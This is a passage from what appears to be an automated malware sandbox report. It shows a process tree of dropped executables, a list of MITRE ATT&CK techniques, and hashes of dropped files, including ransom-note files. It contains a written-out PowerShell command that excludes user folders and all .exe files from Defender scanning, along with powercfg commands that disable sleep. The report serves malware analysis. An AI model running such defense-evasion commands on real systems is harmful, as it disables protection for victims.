  PID:4776
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  PID:4024
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  PID:4484
- C:\Windows\system32\conhost.exe
  C:\Windows\system32\conhost.exe
  2⤵
  PID:5508
- - C:\ProgramData\ndfbaljqaqzm\dckuybanmlgp.exe
    "C:\ProgramData\ndfbaljqaqzm\dckuybanmlgp.exe"
    3⤵
    PID:1636
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
      4⤵
      PID:4472
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
      4⤵
      PID:6648
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
      4⤵
      PID:960
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
      4⤵
      PID:3940
  - - C:\Windows\system32\svchost.exe
      svchost.exe
      4⤵
      PID:6932
- - C:\ProgramData\ndfbaljqaqzm\dckuybanmlgp.exe
    "C:\ProgramData\ndfbaljqaqzm\dckuybanmlgp.exe"
    3⤵
    PID:6448
- - C:\ProgramData\ndfbaljqaqzm\dckuybanmlgp.exe
    "C:\ProgramData\ndfbaljqaqzm\dckuybanmlgp.exe"
    3⤵
    PID:7780
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
      4⤵
      PID:3428
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
      4⤵
      PID:7604
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
      4⤵
      PID:5616
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
      4⤵
      PID:7616
  - - C:\Windows\system32\svchost.exe
      svchost.exe
      4⤵
      PID:2004
- - C:\ProgramData\ndfbaljqaqzm\dckuybanmlgp.exe
    "C:\ProgramData\ndfbaljqaqzm\dckuybanmlgp.exe"
    3⤵
    PID:4372
- - C:\ProgramData\ndfbaljqaqzm\dckuybanmlgp.exe
    "C:\ProgramData\ndfbaljqaqzm\dckuybanmlgp.exe"
    3⤵
    PID:5136
- - C:\ProgramData\ndfbaljqaqzm\dckuybanmlgp.exe
    "C:\ProgramData\ndfbaljqaqzm\dckuybanmlgp.exe"
    3⤵
    PID:4108
- - C:\ProgramData\ndfbaljqaqzm\dckuybanmlgp.exe
    "C:\ProgramData\ndfbaljqaqzm\dckuybanmlgp.exe"
    3⤵
    PID:5584
- - C:\ProgramData\ndfbaljqaqzm\dckuybanmlgp.exe
    "C:\ProgramData\ndfbaljqaqzm\dckuybanmlgp.exe"
    3⤵
    PID:2076
- - C:\ProgramData\ndfbaljqaqzm\dckuybanmlgp.exe
    "C:\ProgramData\ndfbaljqaqzm\dckuybanmlgp.exe"
    3⤵
    PID:4252
- - C:\ProgramData\ndfbaljqaqzm\dckuybanmlgp.exe
    "C:\ProgramData\ndfbaljqaqzm\dckuybanmlgp.exe"
    3⤵
    PID:5852
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
      4⤵
      PID:724
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
      4⤵
      PID:4260
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
      4⤵
      PID:7308
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
      4⤵
      PID:5844
- - C:\ProgramData\ndfbaljqaqzm\dckuybanmlgp.exe
    "C:\ProgramData\ndfbaljqaqzm\dckuybanmlgp.exe"
    3⤵
    PID:5416
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
      4⤵
      PID:6624
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
      4⤵
      PID:2876
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
      4⤵
      PID:3328
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
      4⤵
      PID:1920
- - C:\ProgramData\ndfbaljqaqzm\dckuybanmlgp.exe
    "C:\ProgramData\ndfbaljqaqzm\dckuybanmlgp.exe"
    3⤵
    PID:3796
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
      4⤵
      PID:6376
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
      4⤵
      PID:3808
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
      4⤵
      PID:6220
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
      4⤵
      PID:5496
- - C:\ProgramData\ndfbaljqaqzm\dckuybanmlgp.exe
    "C:\ProgramData\ndfbaljqaqzm\dckuybanmlgp.exe"
    3⤵
    PID:6124
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
      4⤵
      PID:5296
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
      4⤵
      PID:6892
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
      4⤵
      PID:6060
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
      4⤵
      PID:5872
- - C:\ProgramData\ndfbaljqaqzm\dckuybanmlgp.exe
    "C:\ProgramData\ndfbaljqaqzm\dckuybanmlgp.exe"
    3⤵
    PID:4600
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
      4⤵
      PID:748
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
      4⤵
      PID:7268
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
      4⤵
      PID:4976
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
      4⤵
      PID:3544
- - C:\ProgramData\ndfbaljqaqzm\dckuybanmlgp.exe
    "C:\ProgramData\ndfbaljqaqzm\dckuybanmlgp.exe"
    3⤵
    PID:7988
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
      4⤵
      PID:1812
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
      4⤵
      PID:6444
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
      4⤵
      PID:4412
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
      4⤵
      PID:3076
- - C:\ProgramData\ndfbaljqaqzm\dckuybanmlgp.exe
    "C:\ProgramData\ndfbaljqaqzm\dckuybanmlgp.exe"
    3⤵
    PID:7740
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
      4⤵
      PID:5532
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
      4⤵
      PID:5800
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
      4⤵
      PID:556
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
      4⤵
      PID:2308
- - C:\ProgramData\ndfbaljqaqzm\dckuybanmlgp.exe
    "C:\ProgramData\ndfbaljqaqzm\dckuybanmlgp.exe"
    3⤵
    PID:7016
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
      4⤵
      PID:7384
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
      4⤵
      PID:3392
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
      4⤵
      PID:4632
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
      4⤵
      PID:7880
- - C:\ProgramData\ndfbaljqaqzm\dckuybanmlgp.exe
    "C:\ProgramData\ndfbaljqaqzm\dckuybanmlgp.exe"
    3⤵
    PID:1236
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
      4⤵
      PID:2608
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
      4⤵
      PID:5416
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
      4⤵
      PID:7508
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
      4⤵
      PID:4936
- - C:\ProgramData\ndfbaljqaqzm\dckuybanmlgp.exe
    "C:\ProgramData\ndfbaljqaqzm\dckuybanmlgp.exe"
    3⤵
    PID:6240
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
      4⤵
      PID:7464
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
      4⤵
      PID:3160
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
      4⤵
      PID:5104
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
      4⤵
      PID:6216
- C:\Windows\system32\svchost.exe
  svchost.exe
  2⤵
  PID:6860

C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
1⤵
PID:4440
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\EXE~1"
  2⤵
  PID:1708
- - C:\Users\Admin\AppData\Local\Temp\3582-490\EXE~1
    C:\Users\Admin\AppData\Local\Temp\3582-490\EXE~1
    3⤵
    PID:5616

C:\Users\Admin\AppData\Local\Temp\100105~2\NewB.exe
C:\Users\Admin\AppData\Local\Temp\100105~2\NewB.exe
1⤵
PID:860

C:\Users\Admin\AppData\Local\Temp\100105~2\NewB.exe
C:\Users\Admin\AppData\Local\Temp\100105~2\NewB.exe
1⤵
PID:1804

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 7840 -ip 7840
1⤵
PID:5860

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x4b0 0x2f4
1⤵
PID:3784

C:\Users\Admin\AppData\Local\Temp\100105~2\NewB.exe
C:\Users\Admin\AppData\Local\Temp\100105~2\NewB.exe
1⤵
PID:6664

C:\ProgramData\wikombernizc\reakuqnanrkn.exe
C:\ProgramData\wikombernizc\reakuqnanrkn.exe
1⤵
PID:6228
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  PID:3652

C:\Users\Admin\AppData\Local\Temp\100105~2\NewB.exe
C:\Users\Admin\AppData\Local\Temp\100105~2\NewB.exe
1⤵
PID:1588

C:\Users\Admin\AppData\Local\Temp\100105~2\NewB.exe
C:\Users\Admin\AppData\Local\Temp\100105~2\NewB.exe
1⤵
PID:5444

C:\Users\Admin\AppData\Local\Temp\100105~2\NewB.exe
C:\Users\Admin\AppData\Local\Temp\100105~2\NewB.exe
1⤵
PID:6384

C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
1⤵
PID:2268

C:\Windows\system32\werfault.exe
werfault.exe /hc /shared Global\4c343b84d8ac46d083fff8aed9f57e30 /t 7016 /p 1796 3784
1⤵
PID:3640

C:\Windows\system32\sihost.exe
sihost.exe
1⤵
PID:3140

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Scripting

T1064

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Change Default File Association

T1546.001

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Change Default File Association

T1546.001

Scheduled Task/Job

T1053

Defense Evasion

File and Directory Permissions Modification

T1222

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Scripting

T1064

Credential Access

Discovery

Network Service Discovery

T1046

Peripheral Device Discovery

T1120

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Inhibit System Recovery

T1490

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\DBKEGCAE

Filesize
92KB

MD5
4c2e2189b87f507edc2e72d7d55583a0

SHA1
1f06e340f76d41ea0d1e8560acd380a901b2a5bd

SHA256
99a5f8dea08b5cf512ed888b3e533cc77c08dc644078793dc870abd8828c1bca

SHA512
8b6b49e55afe8a697aaf71d975fab9e906143339827f75a57876a540d0d7b9e3cbbcdd8b5435d6198900a73895cc52d2082e66ee8cec342e72f2e427dde71600

Download Submit
C:\ProgramData\HDBKJEGIEBFHCAAKKEBAEBKEBK

Filesize
20KB

MD5
c9ff7748d8fcef4cf84a5501e996a641

SHA1
02867e5010f62f97ebb0cfb32cb3ede9449fe0c9

SHA256
4d3f3194cb1133437aa69bb880c8cbb55ddf06ff61a88ca6c3f1bbfbfd35d988

SHA512
d36054499869a8f56ac8547ccd5455f1252c24e17d2b185955390b32da7e2a732ace4e0f30f9493fcc61425a2e31ed623465f998f41af69423ee0e3ed1483a73

Download Submit
C:\ProgramData\KECBFBAE

Filesize
220KB

MD5
ae2832c888b8c326acf186c6b4838f48

SHA1
1e7ed7c19e006c4566111e7d4bac8a3e7257237e

SHA256
a0b7d1a6ae2ee59f08a300bff5c04758c7dc755c45fb4ce62cc6a16710d8b4a5

SHA512
bf18fe88e0629fa157a725f7f8d4151ae48892ff38048fb7898ff675760637470f960d6ed52010852260d275ac4c0bd534e561bac3a66a80849db133f8cca98a

Download Submit
C:\ProgramData\Microsoft\AppV\Setup\@[email protected]

Filesize
1KB

MD5
863bb3d25bb636ab349643145ecd9171

SHA1
ec3c3ce533bdc9a83a7d02b099f4ade332b412cd

SHA256
c6fbeb510b82671fb2556c0eb9e3b71713778ba4cda54389057d1b2ce49245a0

SHA512
7d08a87fd2e6c908b6bf840aa66b4ea44d9103369b6638529dedf057fa4bde03cecf22285a848bdef491d6597f37cc396f24b4f799112c674417239e59183203

Download Submit
C:\ProgramData\Microsoft\Diagnosis\Microsoft.ServiceHub.Anyns.exe

Filesize
45KB

MD5
310b982faa6a9c8473c6a6097a64317f

SHA1
abdc0ee76d9f21d318c04b12cbbb4453c18a4c57

SHA256
c21d1dd6391ae93398507c94f9b075dbe8baceed4903a78b3f6bebfa85cd155e

SHA512
e9434ff38d01f8983febbd7a4cafeaa4b2f11166adee44a4f6e10a9c25c265e0cefbe7c7a43dd38a3c77bdebdf662e98311184595e52419c03666658a0a4cb8c

Download Submit
C:\ProgramData\Microsoft\Diagnosis\Microsoft.ServiceHub.Control.exe

Filesize
3.1MB

MD5
7b9d9f41d274ddd8fac0544e188ade4a

SHA1
20050de536fbf27cdbfbdd0671af913e04106363

SHA256
50684cb3400e3cd4959c2ccd2dd900a157ef3163179adcf8da15ed5b7b41694b

SHA512
c102873fa15ffd776ab17b16cd39d6ac95c8412dc8c4a0c8c28e1579dd0d03f9fa4f4985d419a76cd4853c5769ea4e95a24c4c1a9c61c98b7508d97c13b345af

Download Submit
C:\ProgramData\Microsoft\Diagnosis\Microsoft.ServiceHub.Header.exe

Filesize
550KB

MD5
55996754b2f5d99044a1f79d9cafe83e

SHA1
1b8d1f7b4cc9867e5270db53583cd8023582687f

SHA256
4d0110004f418ba070623a2e972d35023e7dce41d33f48f1bdd7c97ded1c666b

SHA512
1c090e8257e99746bb057df909afeee0d3d6341afd7ceda57cc9ce89f78f85dcc162e0353540592ce85b820fe1d8032af4c0cbba9ce7a2e8d5f0580c1b5c1bb3

Download Submit
C:\ProgramData\Microsoft\Diagnosis\Sideload\Microsoft.ServiceHub.Taskhost.exe

Filesize
17KB

MD5
11e28d2499f7c530a6b28db768d10a0a

SHA1
db6501b6c05023719438399da2316044c2836490

SHA256
a5c27b8083b31a15602373eab61c9164437aa14f25a2f9aed522f12c3f0b7c39

SHA512
dd5b5dacbe5a4f078d03938ca380167fb84aae39813d6b8f1e5bec56e911ca1696ff06c9a36870076b7b6afdad345154a9a18e4187a5efd6d7ab8cda7eada931

Download Submit
C:\ProgramData\system.exe

Filesize
37KB

MD5
e817d74d13c658890ff3a4c01ab44c62

SHA1
bf0b97392e7d56eee0b63dc65efff4db883cb0c7

SHA256
2945881f15e98a18d27108a29963988190853838f34faf3020e6c3c97342672d

SHA512
8d90ef308c1e0b7e01e7732e2cd819f07bfc1ef06e523efa81694ced75550c9f1be460fc9de412faeb96273a6492580402ab9c9538ed441fc26d96b6785e7815

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\DualEngine\SiteList-Enterprise.json

Filesize
2B

MD5
99914b932bd37a50b983c5e7c90ae93b

SHA1
bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f

SHA256
44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a

SHA512
27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries

Filesize
40B

MD5
20d4b8fa017a12a108c87f540836e250

SHA1
1ac617fac131262b6d3ce1f52f5907e31d5f6f00

SHA256
6028bd681dbf11a0a58dde8a0cd884115c04caa59d080ba51bde1b086ce0079d

SHA512
507b2b8a8a168ff8f2bdafa5d9d341c44501a5f17d9f63f3d43bd586bc9e8ae33221887869fa86f845b7d067cb7d2a7009efd71dda36e03a40a74fee04b86856

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
11KB

MD5
4ea5efddfb564eefd5591cd7e1b493e0

SHA1
1312bb081abc35357dee6c7108933438772d358c

SHA256
47a6f251eab57a1b987dc056a3097d32e91bd99843c3350290605ed2a9d775b1

SHA512
388f8a253401604504f29563894cf3d4af27771dec69f6c5e70d88f78c37f9e24d41eac9a00b531e2842e64158134ace79e1bbc8308efad3fb989c4c463f2f6d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

Filesize
30KB

MD5
8b97ec12f6b744e50a47a5802016e0bd

SHA1
0a414ec9cf68254b185d1d8a0df93f9cbde6f572

SHA256
f47578a3cee9e22415c1122003845921378b3e25b8043467a65b65ec809754bc

SHA512
c2c088cade2fd1fac1f4badb29a0220af82bfd1404f6759a212b8ab8247a43982172641ce76cdd40b5c066d7f6795c8cae5342705d06f6562ebf5e261f3d6d5e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
61KB

MD5
86809fb6703e9412a745282df1364f6c

SHA1
26cb9d9f3d4cd018565f62a3d9872c314ac10c7b

SHA256
59ff1a31a7899589f14d9aef5057b985c03f48121631135c79d7884abb15fb70

SHA512
751b73c582627b0350c8092bafede5ebb3da81f3d4e8f818619102e260b7f5e20fa2496ed19acffafbe5c4b0f14927bfe301c9a4a632e2b80612b3b59248091f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
61KB

MD5
484f9ce1183101183ebe9948efdf724a

SHA1
683335505450aef2d82a804dd78b861e3a4b4071

SHA256
91892e6e50776bd504857457b115ded23ef137403cb6ff335f252dea798ccccc

SHA512
41d0d569176490f33bc7ead96b88d538a172c803881fb990e8a4a007540439f4f708567890c4207e2cebf2e95c78bd1628857a99c8b5f71f853e4e04e2b5a6cc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\VersionManager\ver6DD3.tmp

Filesize
15KB

MD5
1a545d0052b581fbb2ab4c52133846bc

SHA1
62f3266a9b9925cd6d98658b92adec673cbe3dd3

SHA256
557472aeaebf4c1c800b9df14c190f66d62cbabb011300dbedde2dcddd27a6c1

SHA512
bd326d111589d87cd6d019378ec725ac9ac7ad4c36f22453941f7d52f90b747ede4783a83dfff6cae1b3bb46690ad49cffa77f2afda019b22863ac485b406e8d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\OTele\_R_E_A_D___T_H_I_S___HBGZJ_.hta

Filesize
76KB

MD5
7b5d9f8fa891a34afd1bf3bda187083b

SHA1
d9f3be2e906fba21800d06bef24f725d573dca2c

SHA256
e003ba9d1028c899980ab0e99e76caa93438bf859f4f6ae53a99e85fe8568841

SHA512
c9889df72d7ddf3aecd86865b3ae82f5c54c3db48567d677d1affc748736b9d29822f491d175f67fc77051bf5d1c7bbf8f6d9ec4fb5b6cb2988bed38498b1d93

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\OTele\_R_E_A_D___T_H_I_S___MNTW_.txt

Filesize
1KB

MD5
ccb8b7a5cce536c640c918b5e288a007

SHA1
3ca2a9b68bd94f28d2ffbff85d63734e2ec54c26

SHA256
03b6c51a4e0c2eee409c19d7f8b844cddc581451bc2b33cafc4d7d6ffb51391b

SHA512
12405299846856e5dbb90e51cdbb3357bd58146781b0cdeb81ebac6d10b0b7d8ce9c1ea638462797b463ee2ce4c5987a616283a033489f4ce08f1bf19bc6a6b7

Download Submit
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404100847141\additional_file0.tmp

Filesize
2.5MB

MD5
20d293b9bf23403179ca48086ba88867

SHA1
dedf311108f607a387d486d812514a2defbd1b9e

SHA256
fd996b95ae46014edfd630bfc2bf8bc9e626adf883a1da017a8c3973b68ec348

SHA512
5d575c6f0d914583f9bb54f7b884caf9182f26f850da9bdd962f4ed5ed7258316a46fafaf3828dccb6916baaadb681fe1d175a3f4ed59f56066dc7e32b66f7b6

Download Submit
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404100847141\opera_package

Filesize
17.1MB

MD5
a49a70e063c6d5b38aa3d1efc271ac27

SHA1
bcefbee4c92f63f5753b3a1dd7d403b8d9e572d5

SHA256
7476ed4b469164a97e99e516723917b50fa2e704a1a11f3fc30c595dd8d865d5

SHA512
ec9f7393891c88c32e1a80209285ea8f4fa78af1d8a567e8fb7622b72388be34e2cf0a84b7fd07ec526b7ea02631d5455a9c1fdf5b59a7d086ae7469c5bb867f

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000985001\alexxxxxxxx.exe

Filesize
1.7MB

MD5
85a15f080b09acace350ab30460c8996

SHA1
3fc515e60e4cfa5b3321f04a96c7fb463e4b9d02

SHA256
3a2006bc835a8ffe91b9ee9206f630b3172f42e090f4e8d90be620e540f5ef6b

SHA512
ade5e3531dfa1a01e6c2a69deb2962cbf619e766da3d6e8e3453f70ff55ccbcbe21381c7b97a53d67e1ca88975f4409b1a42a759e18f806171d29e4c3f250e9f

Download Submit
C:\Users\Admin\AppData\Local\Temp\1001040001\32456.exe

Filesize
499KB

MD5
83d0b41c7a3a0d29a268b49a313c5de5

SHA1
46f3251c771b67b40b1f3268caef8046174909a5

SHA256
09cc3364d5e1c15228822926bc65ce290c487dc3b7c0345bf265538110fa9cc9

SHA512
705ecc7c421338e37ed0d58c2d9fad03fb3565db422a0c9d895e75a399bf5f2a70cfe3ffdc860ffe010d4d1a213e0a844aeadb89ea8e0c830a2fc8c03b7669b5

Download Submit
C:\Users\Admin\AppData\Local\Temp\1001053001\goldprimeldlldf.exe

Filesize
464KB

MD5
c084d6f6ba40534fbfc5a64b21ef99ab

SHA1
0b4a17da83c0a8abbc8fab321931d5447b32b720

SHA256
afd83290a2adb219c3f1b8fbf23c27b0994fe76dfbb7dc0b416530dc0e21f624

SHA512
a5384a2f7029cf946fde44e1ff30775754ce525ca5a6fdac14184872b6e684cb6e585053cb86d32f82cbd3db48eb195ba3a642d8ee3774be579fccd993938ca1

Download Submit
C:\Users\Admin\AppData\Local\Temp\1001059001\NewB.exe

Filesize
418KB

MD5
0099a99f5ffb3c3ae78af0084136fab3

SHA1
0205a065728a9ec1133e8a372b1e3864df776e8c

SHA256
919ae827ff59fcbe3dbaea9e62855a4d27690818189f696cfb5916a88c823226

SHA512
5ac4f3265c7dd7d172284fb28c94f8fc6428c27853e70989f4ec4208f9897be91720e8eee1906d8e843ab05798f3279a12492a32e8a118f5621ac5e1be2031b6

Download Submit
C:\Users\Admin\AppData\Local\Temp\1001078001\koooooo.exe

Filesize
379KB

MD5
90f41880d631e243cec086557cb74d63

SHA1
cb385e4172cc227ba72baf29ca1c4411fa99a26d

SHA256
23b62a27e3f5c424b16f31e5009af4f24c8bd13b1f035f87879e2a29236be7a0

SHA512
eeb85b34aa66a7e9a1b1807012999ee439433df23126a52ffa8d4b3cb2026be3bcf63ca25f143de58ba929c0d4feeaf2a603fd6ec6b5379fc48147c22f3783e3

Download Submit
C:\Users\Admin\AppData\Local\Temp\1001084001\random.exe

Filesize
2.2MB

MD5
57d35f8e6180eea776298d349ce6475a

SHA1
8a3448ad264d0069a209b6daebbf68249caaae07

SHA256
f057df1ab6adfc045b47190cc11913a6753a06f3f7a93139a2ec812bbec88df2

SHA512
5ec7fed9437cf090562449d88010ee0d794c2e5a68761253a5db6ce5457ed17314baae22d2c009d8812ba8d6812ba225a0a6c4a62fcf8989b6fecbfcbd040946

Download Submit
C:\Users\Admin\AppData\Local\Temp\1001085001\file300un.exe

Filesize
387KB

MD5
74bdac780fec1fa408c8c6898bdba4d3

SHA1
24b39705682a2f69ce0dad8d1c8ada39b967f098

SHA256
1b01d020ef6ec5ca7edf9895ec5cd0aa531f770dd0699bc56c530e03545c6efd

SHA512
99e1ed52b8dc2c628b2d2dafcacec3256e97633666f66c5e314460f9a3cc76b727231d2d7b09cf91683eac3a9014d31629790134351f2976e9fee0dfde343ba4

Download Submit
C:\Users\Admin\AppData\Local\Temp\1001107001\jok.exe

Filesize
304KB

MD5
8510bcf5bc264c70180abe78298e4d5b

SHA1
2c3a2a85d129b0d750ed146d1d4e4d6274623e28

SHA256
096220045877e456edfea1adcd5bf1efd332665ef073c6d1e9474c84ca5433f6

SHA512
5ff0a47f9e14e22fc76d41910b2986605376605913173d8ad83d29d85eb79b679459e2723a6ad17bc3c3b8c9b359e2be7348ee1c21fa2e8ceb7cc9220515258d

Download Submit
C:\Users\Admin\AppData\Local\Temp\1001108001\swiiii.exe

Filesize
158KB

MD5
586f7fecacd49adab650fae36e2db994

SHA1
35d9fb512a8161ce867812633f0a43b042f9a5e6

SHA256
cf88d499c83da613ad5ccd8805822901bdc3a12eb9b15804aeff8c53dc05fc4e

SHA512
a44a2c99d18509681505cf70a251baf2558030a8648d9c621acc72fafcb2f744e3ef664dfd0229baf7c78fb72e69f5d644c755ded4060dcafa7f711d70e94772

Download Submit
C:\Users\Admin\AppData\Local\Temp\184103646.exe

Filesize
8KB

MD5
80f97c916a3eb0e5663761ac5ee1ddd1

SHA1
4ee54f2bf257f9490eaa2c988a5705ef7b11d2bc

SHA256
9e06f61d715b1b88507e3e70390721ab7ab35d70fe2df6edaaf0e565783e7d2f

SHA512
85e30cfc5c02543820f884602701986aa1e40d587da13c35b76b80dc95c0d6b3e18f5b0ad083fcfa3e9b92935306e4f8faec36ac28ac25e53fb03dcba4a092a6

Download Submit
C:\Users\Admin\AppData\Local\Temp\2078513053.exe

Filesize
21KB

MD5
837d57d98e4afcbe2aa6210240a02c8e

SHA1
56e96962a306a3d5bec484d13a88bcb516ebbca9

SHA256
c72da8d9d76f3ce218c1e072b6752590c7b9fd977acac39a2f0b88d906fa401d

SHA512
